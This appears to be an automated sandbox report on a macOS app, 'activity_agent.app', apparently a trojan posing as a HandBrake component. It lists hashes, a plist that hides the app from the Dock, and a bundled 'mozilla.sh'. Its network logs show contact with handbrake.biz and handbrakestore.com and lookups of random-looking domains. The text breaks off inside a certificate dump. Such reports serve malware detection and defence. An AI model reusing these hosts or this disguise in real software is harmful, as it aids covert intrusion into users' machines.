File name:activity_agent.app.zip
File size:1593623
MD5:577cd71ea0456348914312df22e12a5a
SHA1:77002f55859519b69c13cea7bfe9c3bfedebcfcd
SHA256:3b33d950ce045630a2c6a57122fa3c424cced2c57240cadc43f4e7d5f3dfed7c
SHA512:7b421e13fb88c13fd1e193677eaf5a37f2a59af8c797140edcd75261b66e47c45f2675fa9ba49e9692a78392e13e2ad55b1500c88d93c4e4912303a78f6e1a8b
File Content Preview:PK...........J................activity_agent.app/PK...........J................activity_agent.app/Contents/PK...........J..L.........&...activity_agent.app/Contents/Info.plist.....0.....ps'&=..b.,....h...T.....m...G.k..j.]....n.q2.....q.x*99.6L.. ...A....

Static App Info

General Informations

Package Info:
Property List File:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>CFBundleDevelopmentRegion</key>
    <string>en</string>
    <key>CFBundleExecutable</key>
    <string>activity_agent</string>
    <key>CFBundleIdentifier</key>
    <string>fr.handbrake.activity_agent</string>
    <key>CFBundleInfoDictionaryVersion</key>
    <string>6.0</string>
    <key>CFBundleName</key>
    <string>activity_agent</string>
    <key>CFBundlePackageType</key>
    <string>APPL</string>
    <key>CFBundleShortVersionString</key>
    <string>6.0</string>
    <key>CFBundleSignature</key>
    <string>????</string>
    <key>CFBundleSupportedPlatforms</key>
    <array>
        <string>MacOSX</string>
    </array>
    <key>CFBundleVersion</key>
    <string>17</string>
    <key>DTSDKName</key>
    <string>macosx10.11internal</string>
    <key>LSMinimumSystemVersion</key>
    <string>10.7</string>
    <key>LSUIElement</key>
    <true/>
    <key>NSHumanReadableCopyright</key>
    <string>Copyright 2017 caliban0@protonmail.com. All rights reserved.</string>
    <key>NSMainNibFile</key>
    <string>MainMenu</string>
    <key>NSPrincipalClass</key>
    <string>NSApplication</string>
</dict>
</plist>

Resources

| Name | Type |
|---|---|
| Info.plist | XML document text |
| PkgInfo | ASCII text, with no line terminators |
| activity_agent | Mach-O 64-bit executable |
| .hash | DBase 3 data file |
| .tmpdata | data |
| h.icns | data |
| MainMenu.nib | Apple binary property list |
| mozilla.sh | Bourne-Again shell script text executable |
| Security.png | PNG image, 128 x 128, 8-bit/color RGBA, non-interlaced |

Static Mach Info

General Informations for header0

Endian:<
Size:64-bit
Architecture:x86_64
Filetype:execute
Nbr. of load commands:24

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mai 9, 2017 16:26:38.151504993 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151509047 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151513100 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151514053 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151516914 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151520014 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151521921 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151525021 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151525974 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151530027 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151534081 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151537895 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151544094 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151669025 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151675940 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151679039 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151684046 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151686907 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151691914 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151695013 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151700020 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151701927 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151706934 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151710033 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151715040 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151717901 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151722908 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151726007 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151731014 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:38.151732922 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:38.151738882 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:39.441178083 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:39.441627026 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:39.442306995 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:39.442332983 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:39.443130016 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:39.443191051 MESZ4434929785.17.25.66192.168.0.50
Mai 9, 2017 16:26:39.443445921 MESZ49297443192.168.0.5085.17.25.66
Mai 9, 2017 16:26:46.514552116 MESZ5654353192.168.0.508.8.4.4
Mai 9, 2017 16:26:46.514611006 MESZ5017453192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.570800066 MESZ53501748.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.570827961 MESZ53565438.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.607861996 MESZ6037153192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.607943058 MESZ53603718.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.646281958 MESZ5058453192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.646353960 MESZ53505848.8.4.4192.168.0.50
Mai 9, 2017 16:26:47.653693914 MESZ5360353192.168.0.508.8.4.4
Mai 9, 2017 16:26:47.653769016 MESZ5397253192.168.0.508.8.4.4
Mai 9, 2017 16:26:48.539855957 MESZ53539728.8.4.4192.168.0.50
Mai 9, 2017 16:26:48.539880991 MESZ53536038.8.4.4192.168.0.50

UDP Packets


ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Mai 9, 2017 16:25:49.150011063 MESZ | 192.168.0.50 | 85.17.25.66 | 5f7f |  | Echo
Mai 9, 2017 16:26:00.588404894 MESZ | 192.168.0.50 | 146.0.43.101 | ed0b |  | Echo
Mai 9, 2017 16:26:47.608148098 MESZ | 192.168.0.50 | 8.8.4.4 | 10d5 | (Port unreachable) | Destination Unreachable
Mai 9, 2017 16:26:47.646560907 MESZ | 192.168.0.50 | 8.8.4.4 | 3710 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mai 9, 2017 16:25:40.101505041 MESZ | 192.168.0.50 | 8.8.8.8 | 0xac2c | Standard query (0) | script.google.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:25:40.101547003 MESZ | 192.168.0.50 | 8.8.8.8 | 0x879 | Standard query (0) | script.google.com | 28 | IN (0x0001)
Mai 9, 2017 16:25:42.532700062 MESZ | 192.168.0.50 | 8.8.8.8 | 0x646e | Standard query (0) | script.googleusercontent.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:25:42.532779932 MESZ | 192.168.0.50 | 8.8.8.8 | 0x1029 | Standard query (0) | script.googleusercontent.com | 28 | IN (0x0001)
Mai 9, 2017 16:25:47.371352911 MESZ | 192.168.0.50 | 8.8.8.8 | 0x1786 | Standard query (0) | handbrake.biz | A (IP address) | IN (0x0001)
Mai 9, 2017 16:25:47.371386051 MESZ | 192.168.0.50 | 8.8.8.8 | 0xef87 | Standard query (0) | handbrake.biz | 28 | IN (0x0001)
Mai 9, 2017 16:26:00.207238913 MESZ | 192.168.0.50 | 8.8.8.8 | 0xf812 | Standard query (0) | handbrakestore.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:11.675671101 MESZ | 192.168.0.50 | 8.8.8.8 | 0x5811 | Standard query (0) | handbrake.cc | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:12.677753925 MESZ | 192.168.0.50 | 8.8.8.8 | 0x5811 | Standard query (0) | handbrake.cc | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:12.999345064 MESZ | 192.168.0.50 | 8.8.4.4 | 0x5811 | Standard query (0) | handbrake.cc | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:14.201618910 MESZ | 192.168.0.50 | 8.8.8.8 | 0xac07 | Standard query (0) | luwenxdsnhgfxckcjgxvtugj.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:14.589282990 MESZ | 192.168.0.50 | 8.8.8.8 | 0x2e0e | Standard query (0) | 6gmvshjdfpfbeqktpsde5xav.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:15.623080969 MESZ | 192.168.0.50 | 8.8.8.8 | 0x5c6f | Standard query (0) | kjfnbfhu7ndudgzhxpwnnqkc.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:16.646783113 MESZ | 192.168.0.50 | 8.8.8.8 | 0x2939 | Standard query (0) | yaxw8dsbttpwrwlq3h6uc9eq.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:17.609131098 MESZ | 192.168.0.50 | 8.8.8.8 | 0x7 | Standard query (0) | qrtfvfysk4bdcwwwe9pxmqe9.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:18.753406048 MESZ | 192.168.0.50 | 8.8.8.8 | 0x7 | Standard query (0) | qrtfvfysk4bdcwwwe9pxmqe9.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:21.769840002 MESZ | 192.168.0.50 | 8.8.4.4 | 0x7 | Standard query (0) | qrtfvfysk4bdcwwwe9pxmqe9.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:22.904309034 MESZ | 192.168.0.50 | 8.8.4.4 | 0x7 | Standard query (0) | qrtfvfysk4bdcwwwe9pxmqe9.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:23.624594927 MESZ | 192.168.0.50 | 8.8.4.4 | 0x602 | Standard query (0) | fyamakgtrrjt9vrwhmc76v38.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:24.756298065 MESZ | 192.168.0.50 | 8.8.4.4 | 0x602 | Standard query (0) | fyamakgtrrjt9vrwhmc76v38.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:27.900372982 MESZ | 192.168.0.50 | 8.8.8.8 | 0x602 | Standard query (0) | fyamakgtrrjt9vrwhmc76v38.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:29.042088032 MESZ | 192.168.0.50 | 8.8.8.8 | 0x602 | Standard query (0) | fyamakgtrrjt9vrwhmc76v38.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:29.625832081 MESZ | 192.168.0.50 | 8.8.8.8 | 0x2c14 | Standard query (0) | kcdjzquvhsua6hlfbmjzkzsb.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:30.594083071 MESZ | 192.168.0.50 | 8.8.8.8 | 0xdcb1 | Standard query (0) | ypu4vwlenkpt29f95etrqllq.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:31.735508919 MESZ | 192.168.0.50 | 8.8.8.8 | 0xdcb1 | Standard query (0) | ypu4vwlenkpt29f95etrqllq.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:34.873931885 MESZ | 192.168.0.50 | 8.8.4.4 | 0xdcb1 | Standard query (0) | ypu4vwlenkpt29f95etrqllq.com | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:35.905143976 MESZ | 192.168.0.50 | 8.8.4.4 | 0xdcb1 | Standard query (0) | ypu4vwlenkpt29f95etrqllq.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mai 9, 2017 16:25:40.565378904 MESZ | 8.8.8.8 | 192.168.0.50 | 0x879 | Name error (3) | script.google.com | none | none | 28 | IN (0x0001)
Mai 9, 2017 16:25:40.565418005 MESZ | 8.8.8.8 | 192.168.0.50 | 0xac2c | No error (0) | script.google.com |  | 216.58.204.142 | A (IP address) | IN (0x0001)
Mai 9, 2017 16:25:43.600469112 MESZ | 8.8.8.8 | 192.168.0.50 | 0x1029 | Name error (3) | script.googleusercontent.com | none | none | 28 | IN (0x0001)
Mai 9, 2017 16:25:43.600500107 MESZ | 8.8.8.8 | 192.168.0.50 | 0x646e | No error (0) | script.googleusercontent.com |  | 216.58.204.129 | A (IP address) | IN (0x0001)
Mai 9, 2017 16:25:47.582999945 MESZ | 8.8.8.8 | 192.168.0.50 | 0xef87 | Name error (3) | handbrake.biz | none | none | 28 | IN (0x0001)
Mai 9, 2017 16:25:47.583029985 MESZ | 8.8.8.8 | 192.168.0.50 | 0x1786 | No error (0) | handbrake.biz |  | 85.17.25.66 | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:00.587764025 MESZ | 8.8.8.8 | 192.168.0.50 | 0xf812 | No error (0) | handbrakestore.com |  | 146.0.43.101 | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:12.998739004 MESZ | 8.8.8.8 | 192.168.0.50 | 0x5811 | Server failure (2) | handbrake.cc | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:13.630573988 MESZ | 8.8.8.8 | 192.168.0.50 | 0x5811 | Server failure (2) | handbrake.cc | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:13.630601883 MESZ | 8.8.4.4 | 192.168.0.50 | 0x5811 | Server failure (2) | handbrake.cc | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:14.573122025 MESZ | 8.8.8.8 | 192.168.0.50 | 0xac07 | Name error (3) | luwenxdsnhgfxckcjgxvtugj.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:15.562796116 MESZ | 8.8.8.8 | 192.168.0.50 | 0x2e0e | Name error (3) | 6gmvshjdfpfbeqktpsde5xav.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:16.568062067 MESZ | 8.8.8.8 | 192.168.0.50 | 0x5c6f | Name error (3) | kjfnbfhu7ndudgzhxpwnnqkc.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:17.554605961 MESZ | 8.8.8.8 | 192.168.0.50 | 0x2939 | Name error (3) | yaxw8dsbttpwrwlq3h6uc9eq.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:23.564397097 MESZ | 8.8.4.4 | 192.168.0.50 | 0x7 | Name error (3) | qrtfvfysk4bdcwwwe9pxmqe9.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:23.564429998 MESZ | 8.8.4.4 | 192.168.0.50 | 0x7 | Name error (3) | qrtfvfysk4bdcwwwe9pxmqe9.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:23.564450026 MESZ | 8.8.8.8 | 192.168.0.50 | 0x7 | Name error (3) | qrtfvfysk4bdcwwwe9pxmqe9.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:23.564467907 MESZ | 8.8.8.8 | 192.168.0.50 | 0x7 | Name error (3) | qrtfvfysk4bdcwwwe9pxmqe9.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:29.559004068 MESZ | 8.8.8.8 | 192.168.0.50 | 0x602 | Name error (3) | fyamakgtrrjt9vrwhmc76v38.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:29.559037924 MESZ | 8.8.8.8 | 192.168.0.50 | 0x602 | Name error (3) | fyamakgtrrjt9vrwhmc76v38.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:29.559055090 MESZ | 8.8.4.4 | 192.168.0.50 | 0x602 | Name error (3) | fyamakgtrrjt9vrwhmc76v38.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:29.559072018 MESZ | 8.8.4.4 | 192.168.0.50 | 0x602 | Name error (3) | fyamakgtrrjt9vrwhmc76v38.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:30.564300060 MESZ | 8.8.8.8 | 192.168.0.50 | 0x2c14 | Name error (3) | kcdjzquvhsua6hlfbmjzkzsb.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:36.557574987 MESZ | 8.8.4.4 | 192.168.0.50 | 0xdcb1 | Name error (3) | ypu4vwlenkpt29f95etrqllq.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:36.557610035 MESZ | 8.8.4.4 | 192.168.0.50 | 0xdcb1 | Name error (3) | ypu4vwlenkpt29f95etrqllq.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:36.557629108 MESZ | 8.8.8.8 | 192.168.0.50 | 0xdcb1 | Name error (3) | ypu4vwlenkpt29f95etrqllq.com | none | none | A (IP address) | IN (0x0001)
Mai 9, 2017 16:26:36.557648897 MESZ | 8.8.8.8 | 192.168.0.50 | 0xdcb1 | Name error (3) | ypu4vwlenkpt29f95etrqllq.com | none | none | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Subject | Issuer | Not Before | Not After
Mai 9, 2017 16:25:41.716892004 MESZ | 443 | 49294 | 216.58.204.142 | 192.168.0.50 | CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=US | CN=Google Internet Authority G2, O=Google Inc, C=US | Thu Apr 27 10:30:00 CEST 2017 | Thu Jul 20 10:30:00 CEST 2017
Mai 9, 2017 16:25:41.716892004 MESZ | 443 | 49294 | 216.58.204.142 | 192.168.0.50 | CN=Google Internet Authority G2, O=Google Inc, C=US | CN=GeoTrust Global CA, O=GeoTrust Inc., C=US | Wed Apr 01 02:00:00 CEST 2015 | Mon Jan 01 00:59:59 CET 2018
Mai 9, 2017 16:25:41.716892004 MESZ | 443 | 49294 | 216.58.204.142 | 192.168.0.50 | CN=GeoTrust Global CA, O=GeoTrust Inc., C=US | OU=Equifax Secure Certificate Authority, O=Equifax, C=US | Tue May 21 06:00:00 CEST 2002 | Tue Aug 21 06:00:00 CEST 2018
Mai 9, 2017 16:25:44.721575022 MESZ | 443 | 49295 | 216.58.204.129 | 192.168.0.50 | CN=*.googleusercontent.com, O=Google Inc, L=Mountain View, ST=California, C=US | CN=Google Internet Authority G2, O=Google Inc, C=US | Thu Apr 27 10:43:19 CEST 2017 | Thu Jul 20 10:31:00 CEST 2017
Mai 9, 2017 16:25:44.721575022 MESZ | 443 | 49295 | 216.58.204.129 | 192.168.0.50 | CN=Google Internet Authority G2, O=Google Inc, C=US | CN=GeoTrust Global CA, O=GeoTrust Inc., C=US | Wed Apr 01 02:00:00 CEST 2015 | Mon Jan 01 00:59:59 CET 2018
Mai 9, 2017 16:25:44.721575022 MESZ44349295216.58.204.129192.168.0.50CN=GeoTrust Global CA, O=GeoTrust Inc., C=USOU=Equifax Secure Certificate Authority, O=Equifax, C=USTue May 21 06:00:00 CEST 2002Tue Aug 21 06:00:00 CEST 2018[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 
rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]
Mai 9, 2017 16:25:48.631205082 MESZ4434929685.17.25.66192.168.0.50CN=handbrake.biz, OU=PositiveSSL, OU=Domain Control ValidatedCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Apr 29 02:00:00 CEST 2017Mon Apr 30 01:59:59 CEST 2018[[ Version: V3 Subject: CN=handbrake.biz, OU=PositiveSSL, OU=Domain Control Validated Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 24378134875974158951713261952361346902965564853853505420709545282913265130671990526215297517581546808352604556784984894379733245204507279455518802540831459428078206963637731026331844246308870542162153927757747056637243618612820381081898800832982050988869190643889465082353297039648391405706140399448202019269282701086715969276105497720600650656643681863997206736777688269358957502616446454522452663141852488132309222307609841248799351748789688873721558439452678892112647169736732697174195045318432052386534891979570787328324086387950784903292078233911925501258007940725200306989938031943982559427544145827309616152039 public exponent: 65537 Validity: [From: Sat Apr 29 02:00:00 CEST 2017, To: Mon Apr 30 01:59:59 CEST 2018] Issuer: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 8438ece5 76cefb5b b02efbb8 de304215]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ 
[DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.7][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: handbrake.biz DNSName: www.handbrake.biz][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 26 94 AF DF B9 9F 98 08 DF 3E 0D E0 FC F2 05 2A &........>.....*0010: CD A8 57 75 ..Wu]]] Algorithm: [SHA256withRSA] Signature:0000: 0B 08 8B D7 52 6A DA 45 53 99 5C AD 7E EB 01 25 ....Rj.ES.\....%0010: B7 7A FC 47 02 B4 DB BD 82 C8 F0 E2 5E 10 57 0D .z.G........^.W.0020: AE 94 DD 2A 8B 7C EC 49 4C DF C4 C9 13 5E DA B9 ...*...IL....^..0030: F1 86 EA 32 95 71 9F 67 4F 05 6F A6 B5 EC 3E 8E ...2.q.gO.o...>.0040: 55 FB 26 01 31 0A 1E 61 68 34 31 97 CE 1B 1A E7 U.&.1..ah41.....0050: DC 9B 44 3D 93 40 76 C1 6F EB 36 59 2A CF 34 16 ..D=.@v.o.6Y*.4.0060: E1 82 4C 7F 81 E3 60 22 77 0D 36 97 34 C8 22 A8 ..L...`"w.6.4.".0070: 46 30 01 BE F9 3B DF 1E 6E 97 63 34 B3 6D 8D 25 F0...;..n.c4.m.%0080: 92 EC 11 4C A5 36 0C ED 2B FC 4E 68 1B F2 F7 9C ...L.6..+.Nh....0090: 6B 85 44 88 EE 85 85 74 FC E5 85 3E D7 E9 4C 4D k.D....t...>..LM00A0: BD CC 17 EB 92 4E 71 81 26 A3 E3 40 B7 11 54 5C .....Nq.&..@..T\00B0: 12 D4 1A 7C 3E DE 93 39 55 69 7F 75 1C 45 4F 70 ....>..9Ui.u.EOp00C0: 9E FD 07 A7 80 C8 E1 67 E6 42 4F 1C 3E 5E D2 E8 .......g.BO.>^..00D0: D1 C0 50 79 66 A4 E1 15 98 5E 8D 1B 5B 58 C2 73 ..Pyf....^..[X.s00E0: 83 D0 8A 67 C9 B2 A4 D7 9E B5 D2 AF 97 2E A9 22 
...g..........."00F0: 1D E2 91 88 2D DD 5C EB F6 DF F0 6B 31 5F E3 64 ....-.\....k1_.d]
Mai 9, 2017 16:25:48.631205082 MESZ4434929685.17.25.66192.168.0.50CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029[[ Version: V3 Subject: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 18021508317891126045114383893640587389787314988023771299021472384098480478916503597778296613150634219765052113517870635171403307225477983047468706279013651027886500159485348697094115927961850381525182009137128777951162358715158533528593200093291791323275973789174789209802980910482500744419318360338528025872227868058578212418244189425301367382232973595110901594292490129763308095314503250053957090379265992785603931784956681691284995547158646635183735467516188519673313343149548166538558424521681954529559978463371620234598058977077392872218941503229331579208118464720991080636709101634982701306129953489796945248933 public exponent: 65537 Validity: [From: Wed Feb 12 01:00:00 CET 2014, To: Mon Feb 12 00:59:59 CET 2029] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 2b2e6eea d975366c 148a6edb a37c8c07]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 
